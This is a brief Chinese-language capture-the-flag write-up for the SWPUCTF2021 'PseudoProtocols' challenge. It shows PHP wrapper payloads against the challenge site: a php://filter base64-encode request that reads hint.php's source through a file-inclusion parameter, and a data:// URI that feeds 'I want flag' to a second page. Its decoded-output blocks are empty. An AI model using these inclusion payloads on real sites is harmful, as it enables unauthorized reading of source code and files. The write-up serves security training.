SWPUCTF2021-PseudoProtocols
页面分析
进入页面显示hint is hear Can you find out the hint.php?
当前url为: http://node2.anna.nssctf.cn:28424/index.php?wllm=
php伪协议读取hint.php
根据页面提示尝试
1 | ?wllm=php://filter/convert.base64-encode/resource=hint.php |
解码后得到
1 |
|
访问 http://node2.anna.nssctf.cn:28424/test2222222222222.php
可以得到
1 |
|
data伪协议构造读取
1 | /test2222222222222.php?a=data://text/plain;base64,SSB3YW50IGZsYWc= # base64('I want flag') |
即可获取flag